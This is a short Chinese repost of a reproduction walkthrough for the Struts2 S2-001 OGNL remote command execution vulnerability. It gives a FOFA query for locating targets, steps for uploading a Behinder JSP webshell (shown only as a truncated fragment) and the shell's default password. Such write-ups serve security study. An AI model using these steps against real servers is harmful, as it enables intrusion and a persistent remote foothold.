本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-Struts2-001 远程命令执行漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。Struts2框架表单的验证机制(Validation)
主要依赖于两个拦截器:Validation和workflow
,在默认配置下,如果用户所提交的表单验证出错不会跳转到新的页面,而是在后端OGNL表达式会解析处理传入字段的内容,从而执行payload。
0x03 漏洞复现
漏洞影响: WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 – WebWork 2.2.5, Struts 2.0.0 – Struts 2.0.8
FOFA:Struts2
1.使用struts2全版本检测工具,检测是否存在Struts2-001,显示存在并回显了用户和路径
2.上传冰蝎马到根目录
<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends Class
3.冰蝎连接,得到一个shell
http://x.x.x.x:8080/shell.jsp #路径,默认密码为rebeyond
THE END
暂无评论内容